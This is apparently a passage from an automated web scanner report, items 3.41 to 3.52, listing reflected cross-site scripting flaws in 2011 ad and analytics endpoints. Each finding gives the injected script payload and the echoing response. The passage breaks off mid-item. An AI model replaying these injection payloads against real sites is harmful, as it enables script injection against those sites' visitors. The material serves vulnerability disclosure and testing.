Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0awupiiJtt7A1ExkNK7HUtFp4B4dlWpgdgfBIoZ4uj4Tz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 23 Jul 2011 13:49:17 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: a0894<script>alert(1)</script>80c70e92325

3.41. http://api.chartbeat.com/toppages/ [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.chartbeat.com
Path:   /toppages/

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload db4b0<script>alert(1)</script>71de4d7e894 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toppages/?host=observer.com&jsonp=chartbeat_top_pages.cback3471572db4b0<script>alert(1)</script>71de4d7e894&apikey=e58ef8b1512d5591696ca4b8badf20b9&limit=20 HTTP/1.1
Host: api.chartbeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.observer.com/

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 21 Jul 2011 16:12:58 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 3697

chartbeat_top_pages.cback3471572db4b0<script>alert(1)</script>71de4d7e894([{"i": "The New York Observer", "path": "\/", "visitors": 80}, {"i": "Cond\u00e9 Nast Is Experiencing Technical Difficulties | The New York Observer", "path": "\/2011\/07\/scott-dadich-ipad-conde-nast
...[SNIP]...

3.42. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload e7f85<script>alert(1)</script>8e46a0d32e1 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8e7f85<script>alert(1)</script>8e46a0d32e1&c2=6035308&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:48 GMT
Date: Sat, 23 Jul 2011 04:48:48 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8e7f85<script>alert(1)</script>8e46a0d32e1", c2:"6035308", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.43. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 69d7d<script>alert(1)</script>bd4bc215a3 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=&c5=&c6=&c10=69d7d<script>alert(1)</script>bd4bc215a3&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:50 GMT
Date: Sat, 23 Jul 2011 04:48:50 GMT
Content-Length: 1233
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"", c6:"", c10:"69d7d<script>alert(1)</script>bd4bc215a3", c15:"", c16:"", r:""});



3.44. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 6f3bf<script>alert(1)</script>617bda7171c was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=&c5=&c6=&c10=&c15=6f3bf<script>alert(1)</script>617bda7171c HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:50 GMT
Date: Sat, 23 Jul 2011 04:48:50 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"6f3bf<script>alert(1)</script>617bda7171c", c16:"", r:""});



3.45. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload e1585<script>alert(1)</script>9de0649acd8 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308e1585<script>alert(1)</script>9de0649acd8&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308e1585<script>alert(1)</script>9de0649acd8", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.46. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 67bdb<script>alert(1)</script>2adb1e58fa was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=67bdb<script>alert(1)</script>2adb1e58fa&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1233
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308", c3:"67bdb<script>alert(1)</script>2adb1e58fa", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.47. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload e02b4<script>alert(1)</script>82808a089c4 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=e02b4<script>alert(1)</script>82808a089c4&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"e02b4<script>alert(1)</script>82808a089c4", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.48. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload a47dd<script>alert(1)</script>2e55cdb84e7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=&c5=a47dd<script>alert(1)</script>2e55cdb84e7&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"a47dd<script>alert(1)</script>2e55cdb84e7", c6:"", c10:"", c15:"", c16:"", r:""});



3.49. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 714e5<script>alert(1)</script>3108d5897f1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=&c5=&c6=714e5<script>alert(1)</script>3108d5897f1&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"", c6:"714e5<script>alert(1)</script>3108d5897f1", c10:"", c15:"", c16:"", r:""});



3.50. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonglobe.tt.omtrdc.net
Path:   /m2/bostonglobe/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 75990<script>alert(1)</script>7536adf48f6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/bostonglobe/mbox/standard?mboxHost=www.boston.com&mboxSession=1311428781592-195064&mboxPage=1311428781592-195064&screenHeight=1200&screenWidth=1920&browserWidth=948&browserHeight=845&browserTimeOffset=-300&colorDepth=32&mboxXDomain=enabled&mboxCount=1&mboxPageValue=0.74&pageType=Article%20Page&path=%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F&profile.userRegistered=false&user.categoryAffinity=Lifestyle&mbox=bc_globalMbox75990<script>alert(1)</script>7536adf48f6&mboxId=0&mboxTime=1311410781597&mboxURL=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: bostonglobe.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311428781592-195064.17; Domain=bostonglobe.tt.omtrdc.net; Expires=Sat, 06-Aug-2011 13:49:13 GMT; Path=/m2/bostonglobe
Content-Type: text/javascript
Content-Length: 209
Date: Sat, 23 Jul 2011 13:49:12 GMT
Server: Test & Target

mboxFactories.get('default').get('bc_globalMbox75990<script>alert(1)</script>7536adf48f6',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1311428781592-195064.17");

3.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs [apui parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the apui request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b705%3balert(1)//d4158ff9622 was submitted in the apui parameter. This input was echoed as 2b705;alert(1)//d4158ff9622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=12b705%3balert(1)//d4158ff9622 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAAYyYClQAAAAA.&pubclick=http://adclick.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/
Cookie: C4=; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; ActivityInfo=000iPlceU%5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=lHQFb8QF0aSM00002; expires=Wed, 19-Oct-2011 14:01:49 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=al.q0000000002vH; expires=Wed, 19-Oct-2011 14:01:49 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 21 Jul 2011 18:01:49 GMT
Connection: close
Content-Length: 2420

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
.replace(/\[ebRandom\]/ig,ebRand).replace(/\[timestamp\]/ig,ebRand).replace(/\[%tp_adid%\]/ig,5684521).replace(/\[%tp_flightid%\]/ig,2711514).replace(/\[%tp_campaignid%\]/ig,155604);}var strAPU="";if(12b705;alert(1)//d4158ff9622==1)strAPU=ebTokens(gEbBAd.playRS.strAUrl);document.write("<IMG SRC="+strAPU+" width=0 height=0 style='position:absolute;left:0px;top:0px;'>
...[SNIP]...

3.52. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer [trurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://contextlinks.netseer.com
Path:   /dsatserving2/servlet/BannerServer

Issue detail

The value of the trurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeab6"><script>alert(1)</script>1e5a96efa2 was submitted in the trurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

